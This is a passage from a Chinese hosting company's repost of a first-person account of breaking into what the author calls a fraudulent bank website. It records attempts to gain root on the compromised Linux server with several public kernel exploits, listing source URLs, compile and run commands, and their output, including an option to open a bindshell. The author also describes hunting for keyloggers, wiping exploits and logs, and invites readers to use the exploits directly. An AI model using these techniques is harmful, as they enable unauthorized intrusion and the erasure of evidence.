手机站
网通分站
电信主站
密 码:
用户名:
当前位置 : 主页>网站运营>建站经验>列表

我那次入侵中国虚假银行的实录

来源:互联网 作者:west263.com 时间:2008-04-16
西部数码-全国虚拟主机10强!40余项虚拟主机管理功能,全国领先!双线多线虚拟主机南北访问畅通无阻!免费赠送企业邮局,.CN域名,自助建站480元起,免费试用7天,满意再付款! P4主机租用799元/月.月付免压金!

[ ] SLAB cleanup
[-] FAILED: get_slab_objs: /proc/slabinfo not readable? (No such file or directory)
sh: line 9: 24080 Killed ./elflbl_v109
------------------------------------------------------------------------


(3)Linux内核本地整数溢出和内存泄露漏洞
fun with linux kernel
URL:
_bug&do=view&bug_id=7269&keyword=" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7269&keyword=
_blank>http://marc.theaimsgroup.com/?l=full-disclosure&m=110374209001676&w=2
测试:

gcc -o vc vc_resize.c
./vc_resize
------------------------------------------------------------------------
open: No such device or address
------------------------------------------------------------------------
gcc memory_leak.c -o memory_leak
------------------------------------------------------------------------
memory_leak.c:80:2: warning: no newline at end of file
------------------------------------------------------------------------


(4)Linux Kernel do_mremap VMA本地权限提升漏洞
Linux kernel do_mremap VMA limit local privilege escalation
URL:
_bug&do=view&bug_id=6102&keyword=提升" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=6102&keyword=提升
_blank>http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
文档:
_pte.c" target=_blank>http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c
测试:

gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
./mremap_pte
------------------------------------------------------------------------
[ ] kernel 2.4.20-021stab022.11.777-enterprise vulnerable: YES exploitable YES
MMAP #65530 0x50bfa000 - 0x50bfb000
[-] Failed
------------------------------------------------------------------------


(5)Linux Kernel kmod/ptrace竞争条件权限提升漏洞
linux kmod/ptrace bug - details
URL:
_bug&do=view&bug_id=4570&keyword=提升" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=4570&keyword=提升
_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=104811209231385&w=2
文档:
_blank>http://august.v-lo.krakow.pl/~anszom/km3.c
测试:

gcc -o km3 km3.c
./km3 ?
------------------------------------------------------------------------
Usage: ./km3 [-d] [-b] [-r] [-s] [-c executable]
-d -- use double-ptrace method (to run interactive programs)
-b -- start bindshell on port 4112
-r -- support randomized pids
-c -- choose executable to start
-s -- single-shot mode - abort if unsuccessful at the first try
------------------------------------------------------------------------
./km3 -s
------------------------------------------------------------------------
Linux kmod ptrace local root exploit by <anszom@v-lo.krakow.pl>

=> Simple mode, executing /usr/bin/id > /dev/tty
sizeof(shellcode)=95
=> Child process started..........
Failed
------------------------------------------------------------------------


(6)Linux Kernel i386 SMP页错误处理器特权提升漏洞
Linux kernel i386 SMP page fault handler privilege escalation
URL:
_bug&do=view&bug_id=7338" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7338
_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=110554694522719&w=2
测试:

gcc -o smp smp.c
./smp
------------------------------------------------------------------------
[ ] in thread 1 (pid = 5400)
[ ] in thread 2 (pid = 5401)
[ ] rdtsc calibration: 53428
[ ] exploiting race, wait...
[-] unable to exploit race in 30s,
kernel patched or load too high.
------------------------------------------------------------------------


尝试多个本地提权均未能成功!很郁闷!而在测试过程的时候,虚假网站已被关闭了,虽然文档还在,但是很明显官方已作了努力,并得到了不错的结果。
6、其他
找了几个linux的键盘记录,都要root权限。而服务器远程连接使用的ssh的,使用sniffer也估计没戏,所以暂时也没什么思路,清理exp、日志文档。
以上是我的一些测试的结果,结果也没有拿到root,但是我整理了一下相关的漏洞,希望对大家以后有些帮助。在站长群里发布了相关的结果,也没有人回话,不知道大家是太忙。。。
文中并未特别处理漏洞及结果,有兴趣的能够直接利用,但是没必要为难其他站点,我想大家明白我的意思!
折腾了这么久,更有好多工作的事情要做!希望不会被老板说,呵呵!
最后感谢Edward、老黑及几位公司的高人

文章整理:西部数码--专业提供域名注册虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!

上一页 1 2下一页
[打印] [关闭]
Google
相关文章
上一篇: 入侵网站的各种漏洞的利用
下一篇: 虚拟主机封杀webshell提权
热点关注
IDC资讯 虚拟主机 域名注册 托管租用 vps主机 智能建站
网站运营 建站经验 策划盈利 搜索优化 网站推广 免费资源
网站联盟 联盟新闻 联盟介绍 联盟点评 网赚技巧
行业资讯 业界动态 搜索引擎 网络游戏 门户动态 电子商务 广告传媒
网络编程 Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术 Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷 Internet Explorer
网页制作 FrontPages Dreamweaver Javascript css photoshop fireworks Flash
程序设计 Java技术 C/C++ VB delphi
网络知识 网络协议 网络安全 网络管理 组网方案 Cisco技术
操作系统 Win2000 WinXP Win2003 Mac OS Linux FreeBSD
返回首页 |关于我们 | 联系我们 | 付款方式 | 创业联盟 | 价格总览 | 资讯中心 | 友情链接 | 网站地图 | 招贤纳士 | RSS